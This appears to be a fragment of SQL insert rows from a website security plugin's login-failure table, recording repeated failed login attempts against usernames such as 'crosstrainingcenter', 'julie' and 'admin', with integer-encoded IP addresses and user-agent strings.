(100173, 1494599743.684859, 1, 'loginFailValidUsername', 'julie', 2, 3719344542, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_48_01) AppleWebKit/533.07.50 (KHTML, like Gecko) Chrome/53.6.1896.6168 Safari/530.77 Edge/34.73473'),
(100172, 1494597023.747279, 1, 'loginFailInvalidUsername', 'admin@pour', 0, 1119841390, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100171, 1494596451.173248, 1, 'loginFailInvalidUsername', 'manager', 0, 3116589525, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100170, 1494596017.189806, 1, 'loginFailInvalidUsername', 'manager', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100169, 1494593757.824835, 1, 'loginFailValidUsername', 'julie', 2, 1868455274, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.96.49 (KHTML, like Gecko) Chrome/57.5.0875.5147 Safari/530.67 OPR/40.6.1698.7960'),
(100168, 1494587752.984324, 1, 'loginFailValidUsername', 'julie', 2, 657485531, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.26.79 (KHTML, like Gecko) Chrome/53.7.3890.8062 Safari/531.86'),
(100167, 1494581627.202608, 1, 'loginFailValidUsername', 'julie', 2, 823085059, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_45_08) AppleWebKit/533.04.57 (KHTML, like Gecko) Chrome/53.6.1576.6838 Safari/530.74 Edge/34.70175'),
(100166, 1494575447.635802, 1, 'loginFailValidUsername', 'julie', 2, 2033593486, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.18.65 (KHTML, like Gecko) Chrome/53.6.1688.5316 Safari/534.57'),
(100165, 1494562854.225601, 1, 'loginFailValidUsername', 'julie', 2, 20576305, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.56.19) Gecko/20167903 Firefox/52.56.19'),
(100164, 1494556331.000937, 1, 'loginFailValidUsername', 'julie', 2, 700293937, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.58.01) Gecko/20160334 Firefox/52.58.01'),
(100163, 1494549839.527500, 1, 'loginFailValidUsername', 'julie', 2, 1440508634, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.87.30 (KHTML, like Gecko) Chrome/56.3.9890.4162 Safari/534.47 OPR/44.5.0613.5985'),
(99352, 1492929661.656740, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99353, 1492929662.304351, 1, 'loginFailValidUsername', 'pablo', 3, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99354, 1492929662.987883, 1, 'loginFailValidUsername', 'admin', 1, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99355, 1492933329.938497, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3753785098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99356, 1492933331.330627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3753785098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99357, 1492940466.562234, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 411503849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99358, 1492940468.372584, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 411503849, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99359, 1492940902.484091, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032445579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99360, 1492940904.189857, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3032445579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99361, 1492949241.104111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2094356282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99362, 1492949242.606022, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2094356282, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99363, 1492951040.131085, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136393096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99364, 1492951041.839434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136393096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99365, 1492952998.637411, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1300185300, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99366, 1492956613.050558, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771231821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99367, 1492956614.304557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 771231821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99368, 1492957583.809696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 973646844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99369, 1492959293.675682, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1538676748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99370, 1492959294.683327, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1538676748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99371, 1492959318.529929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2599704618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99372, 1492959320.703201, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2599704618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99373, 1492959490.353820, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781729123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99374, 1492959491.622306, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781729123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99375, 1492963893.909202, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18314902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99376, 1492963895.390585, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18314902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99377, 1492966940.028683, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1868055168, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99378, 1492966942.046357, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1868055168, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99379, 1492967960.218853, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3126433090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99380, 1492967961.637935, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3126433090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99381, 1492968528.477499, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384290088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99382, 1492968529.503829, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384290088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99383, 1492969852.166549, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1506639269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99384, 1492969853.292732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1506639269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99385, 1492975214.885623, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039906593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99386, 1492975219.519800, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039906593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99387, 1492977408.666205, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630622701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99388, 1492977409.802242, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630622701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99389, 1492981066.193661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197692239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99390, 1492981067.580630, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197692239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99391, 1492992617.132618, 1, 'loginFailValidUsername', 'julie', 2, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99392, 1492992619.698563, 1, 'loginFailValidUsername', 'julie', 2, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99393, 1492992621.928154, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99394, 1492992623.898700, 1, 'loginFailValidUsername', 'pablo', 3, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99395, 1492992625.764211, 1, 'loginFailValidUsername', 'admin', 1, 2111108014, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99396, 1492994207.076557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694229235, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99397, 1493000029.583305, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3149830434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99398, 1493004981.394282, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991539866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99399, 1493004982.569906, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991539866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99400, 1493008549.195892, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1840211296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99401, 1493008550.257095, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1840211296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99402, 1493015499.474278, 1, 'loginFailValidUsername', 'julie', 2, 2057029096, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99403, 1493021883.348600, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979775226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99404, 1493021885.827401, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979775226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99405, 1493026018.364045, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99406, 1493026019.476796, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99407, 1493026366.748639, 1, 'loginFailValidUsername', 'julie', 2, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99408, 1493026367.459888, 1, 'loginFailValidUsername', 'julie', 2, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99409, 1493026368.162904, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99410, 1493026368.873318, 1, 'loginFailValidUsername', 'pablo', 3, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99411, 1493026369.805710, 1, 'loginFailValidUsername', 'admin', 1, 1599408102, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99412, 1493026796.599304, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065733296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99413, 1493026798.131065, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065733296, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99414, 1493034743.830183, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3058341779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99415, 1493034745.090619, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3058341779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99416, 1493036722.247440, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 837089132, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99417, 1493038680.089695, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3017243651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99418, 1493038681.541839, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3017243651, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99419, 1493043124.835329, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3397505593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99420, 1493043126.061219, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3397505593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99421, 1493044966.067198, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2167236030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99422, 1493044967.409999, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2167236030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99423, 1493046341.813760, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741612838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99424, 1493046343.679322, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741612838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99425, 1493051120.610123, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835651189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99426, 1493051121.754831, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835651189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99427, 1493053170.672976, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892753981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99428, 1493055055.130241, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1484515861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99429, 1493056021.877526, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419896414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99430, 1493056023.858472, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419896414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99431, 1493056341.385848, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2994214105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99432, 1493056342.732522, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2994214105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99433, 1493056490.171516, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1500726576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99434, 1493056491.222566, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1500726576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99435, 1493057105.120875, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1242501469, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99436, 1493057134.751530, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1476077362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99437, 1493057138.552144, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1476077362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99438, 1493057139.902494, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1459691243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99439, 1493058050.769749, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833903990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99440, 1493058051.976170, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833903990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99441, 1493058494.207632, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1222315437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99442, 1493058495.433444, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1222315437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99443, 1493062747.172440, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657929581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99444, 1493062748.524406, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657929581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99445, 1493065916.418847, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3057735558, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99446, 1493065918.337474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3057735558, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99447, 1493066313.614563, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657352762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99448, 1493066315.041927, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657352762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99449, 1493068009.075598, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1837181866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99450, 1493071366.572061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3735426338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99451, 1493071368.112384, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3735426338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99452, 1493071787.802028, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1473126706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99453, 1493075786.368938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 86724239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99454, 1493079982.264612, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 842254621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99455, 1493085701.240804, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2320235926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99456, 1493086694.375248, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3579766044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99457, 1493086695.473861, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3579766044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99458, 1493087412.114776, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2399207350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99459, 1493087466.716597, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2637388761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99460, 1493087945.830591, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754818252, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99461, 1493098899.974467, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741772220, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99462, 1493104436.000675, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702756256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99463, 1493104704.588941, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2943288819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99464, 1493104871.762865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2738198454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99465, 1493113576.502924, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892283248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99466, 1493113581.121560, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892283248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99467, 1493114994.167128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1402516394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99468, 1493114995.160015, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1402516394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99469, 1493119406.394865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2989586658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99470, 1493119407.571793, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2989586658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99471, 1493120525.805473, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3116416041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99472, 1493120526.780515, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3116416041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99473, 1493121788.288927, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1401323221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99474, 1493121993.747385, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704787301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99475, 1493121995.082455, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704787301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99476, 1493123094.155899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887842097, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99477, 1493125991.354930, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781684966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99478, 1493125992.703420, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781684966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
